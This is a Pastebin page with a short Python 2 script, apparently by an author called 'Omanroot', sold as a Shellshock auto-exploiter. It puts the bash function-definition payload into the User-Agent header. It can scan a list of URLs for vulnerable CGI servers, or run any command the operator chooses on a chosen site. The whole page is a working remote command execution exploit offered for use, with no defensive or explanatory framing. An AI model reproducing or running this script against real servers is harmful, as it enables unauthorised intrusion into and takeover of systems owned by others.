Advertisement
3xploit3r

Shell Shock Auto Exploiter

Aug 2nd, 2016
475
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.90 KB | None | 0 0
  1. #wrote by Omanroot
  2. #om-root@hotmail.com
  3. #(C) 15 year
  4. import urllib
  5. import sys , optparse
  6. def scanning(urllist):
  7. ul = open(urllist,'r') # opening file which have urls
  8. for url in ul.readlines():
  9. command = "/bin/uname -a"
  10. urllib.FancyURLopener.version = "() { :;}; echo \"Content-Type: text/plain\"; echo; "+command
  11. opener = urllib.FancyURLopener({})
  12. page = opener.open(url)
  13. if 'Linux' in page.read():
  14. print "[+]Found vulnerable site: "+url
  15. else:
  16. print "[-]Not a vulnerable: "+url
  17.  
  18. def attacking(site,cmd):
  19. try:
  20. urllib.FancyURLopener.version = "() { :;}; echo \"Content-Type: text/plain\"; echo; "+cmd
  21. opener = urllib.FancyURLopener({})
  22. pageinfo = opener.open(site)
  23. print pageinfo.read()
  24. except:
  25. print "cannot reachable to site ."
  26. def Main():
  27. print """
  28. ----------------------------------------------------
  29. | scanning and exploit shellshock (WA) |
  30. | author : Omanroot |
  31. | email : om-root@hotmail.com |
  32. | from : Oman |
  33. ----------------------------------------------------
  34. """
  35. parser = optparse.OptionParser("Usage by python "+sys.argv[0]+" \nscanning mode:\n -U <urllist>\n Attacking mode: \n -s <site> -c <cmd>")
  36. parser.add_option('-U',dest='urllist',type='string',help='put urllist to check if its vulerable.')
  37. parser.add_option('-s',dest='site',type='string',help='specify site to execute a command .')
  38. parser.add_option('-c',dest='cmd',type='string',help='specify command path to execute ,eg: /bin/ls')
  39. (options,args) = parser.parse_args()
  40. if options.urllist !=None:
  41. print "Starting scanning mode.. "
  42. scanning(options.urllist)
  43. else:
  44. print parser.usage[0:0]
  45. if (options.site != None) | (options.cmd !=None):
  46. print "Starting Attacking mode.. "
  47. attacking(options.site,options.cmd)
  48. else:
  49. print parser.usage
  50.  
  51. if __name__=='__main__':
  52. Main()
  53. # "Starting scanning mode.. " , "Starting Attacking mode.. "
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement